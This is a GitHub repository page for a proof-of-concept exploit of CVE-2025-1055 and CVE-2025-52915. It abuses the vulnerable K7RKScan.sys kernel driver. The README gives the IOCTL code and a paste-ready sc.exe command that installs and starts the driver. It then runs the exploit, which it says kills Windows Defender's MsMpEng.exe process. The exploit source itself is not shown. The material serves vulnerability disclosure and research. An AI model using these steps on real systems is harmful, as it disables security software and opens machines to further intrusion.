Skip to content

rkruso/CVE-2025-1055-poc

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
K7RKScan_1516.sys
K7RKScan_1516.sys
 
 
K7RKScan_2310.sys
K7RKScan_2310.sys
 
 
README.md
README.md
 
 
exploit.c
exploit.c
 
 

Repository files navigation

CVE-2025-1055-poc

PoC for CVE-2025-1055 and CVE-2025-52915 using K7RKScan.sys. This PoC use the 0x222018 IOCTL to terminate arbitrary processes.

Usage

Installing driver:

sc.exe create K7RKScan_1516.sys binPath=C:\Users\Administrator\Downloads\K7RKScan_1516.sys type=kernel && sc.exe start K7RKScan_1516.sys

Running PoC:

exploit.exe

It will terminate the MsMpEng.exe process (windows defender).

References

https://blacksnufkin.github.io/posts/BYOVD-CVE-2025-52915/

About

PoC for CVE-2025-1055 and CVE-2025-52915 using K7RKScan.sys

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • C 100.0%